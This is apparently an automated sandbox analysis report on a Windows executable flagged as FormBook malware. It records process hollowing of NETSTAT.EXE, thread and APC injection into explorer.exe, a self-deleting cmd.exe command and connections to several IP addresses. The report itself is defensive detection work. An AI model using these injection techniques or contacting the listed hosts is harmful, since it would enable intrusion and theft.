          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01218EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03861B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03861B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0390D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03882397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03884BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03884BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03884BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03925BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039023E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039023E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039023E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03928B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03883B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03883B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0386AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0386AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03882ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03882AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03868A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03855210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03855210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03855210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03855210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03873A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03894A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03894A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0390B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0390B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03928A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03882990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03859080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.107.56.57 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeMemory written: C:\Users\user\Desktop\65BV6gbGFl.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: F10000
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess created: C:\Users\user\Desktop\65BV6gbGFl.exe C:\Users\user\Desktop\65BV6gbGFl.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\65BV6gbGFl.exe'
          Source: explorer.exe, 00000002.00000000.665705236.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.1008790045.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009996864.0000000004CC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.1008790045.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009996864.0000000004CC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.1008790045.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009996864.0000000004CC0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.1008790045.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009996864.0000000004CC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.687482352.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Users\user\Desktop\65BV6gbGFl.exe VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORY
